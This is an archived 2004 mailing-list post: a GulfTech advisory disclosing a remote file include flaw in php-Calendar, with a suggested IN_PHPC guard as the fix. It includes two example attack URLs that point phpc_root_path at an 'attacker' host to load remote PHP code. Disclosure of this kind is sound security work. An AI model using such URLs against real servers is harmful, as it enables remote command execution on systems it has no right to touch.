Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

php-Calendar File Include Vulnerability [ Command Exec ]

from [GulfTech Security] Network Security [Permanent Link]
Subject: php-Calendar File Include Vulnerability [ Command Exec ]
Date: Wed, 29 Dec 2004 08:43:37 -0600 
##########################################################
# GulfTech Security Research            December 28th, 2004
##########################################################
# Vendor  : Sean Proctor
# URL     : http://php-calendar.sourceforge.net/
# Version : All Versions
# Risk    : File Include Vulnerability
##########################################################



Description:
I was searching for a decent calendar which my group at school 
could use to keep track of events, etc. We were previously using 
localendar, which I didn't like and it had some problems. I found 
CST-Calendar which did most of what I wanted, but was rather ugly 
and missed some features others in the group wanted. So, I 
gradually re-wrote CST-Calendar since that project seems to have 
stopped work entirely. [ As quoted from their website ]



File Include Vulnerability:
There is a very dangerous file include vulnerability in 
php-calendar, and making the issue even more dangerous is that I 
found out about php-calendar from an individual who said that 
php-calendar is a great open source calendar to use in php projects, 
and is fairly popular amongst open source php developers. This may be 
true, but the vulnerabilities need to be fixed if the same conditions 
apply as found in the original code. Below are example attack url's

http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/ht
ml.php
http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.
php

If php globals are set to on then it is highly probable that an 
attacker will be able to include arbitrary php files and thus execute 
system commands with the rights of the web server. This can be very 
dangerous in some situations.


Solution:
php-calendar has a defined constant to help prevent against stuff 
like this. It can be seen in other php-calendar files such as db.php

if ( !defined('IN_PHPC') ) {
        die("Hacking attempt");
}

Adding the following to the top of the affected pages should suffice 
in preventing the kinds of attacks previously mentioned in this advisory.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00060-12292004



Credits:
James Bercegay of the GulfTech Security Research Team

-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.6.6 - Release Date: 12/28/2004
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • php-Calendar File Include Vulnerability [ Command Exec ], GulfTech Security <=
Previous by Date:  Re: Did a 16-bit counter overflow shut down Comair?, Mike Nice
Next by Date:  Re: Did a 16-bit counter overflow shut down Comair?, Avleen Vig
Previous by Thread:  Sanity Worm Concepts, Andy Fewtrell
Next by Thread:  [CLA-2004:909] Conectiva Security Announcement - netpbm, Conectiva Updates
Indexes:  [Date] [Thread] [Top] [All Lists]